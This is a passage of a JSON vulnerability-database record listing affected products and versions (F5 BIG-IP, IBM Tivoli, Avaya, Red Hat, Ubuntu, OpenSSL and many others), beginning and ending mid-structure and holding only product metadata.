"ne", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.2" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20070" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "hardware management console 7r7.3.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.3" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "messaging storage server", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.14" }, { "model": "project openssl 0.9.8s", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "enterprise linux desktop version", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "project openssl 1.0.0f", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.50" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.55" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "big-ip psm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.1.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.1.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4" }, { "model": "meeting exchange", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "jboss enterprise web server for solaris", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.2" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "message networking sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux enterprise server for vmware sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "infosphere balanced warehouse d5100", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "hardware management console 7r7.2.0 sp2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "onboard administrator", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.56" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.12" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "fiery print controller", "scope": "eq", "trust": 0.3, "vendor": "efi", "version": "2.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "docucolor dc260", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "docucolor dc242", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "linux enterprise server sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.13" }, { "model": "aura sip enablement services sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura communication manager utility services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.1" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.9" }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "linux lts lpia", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", 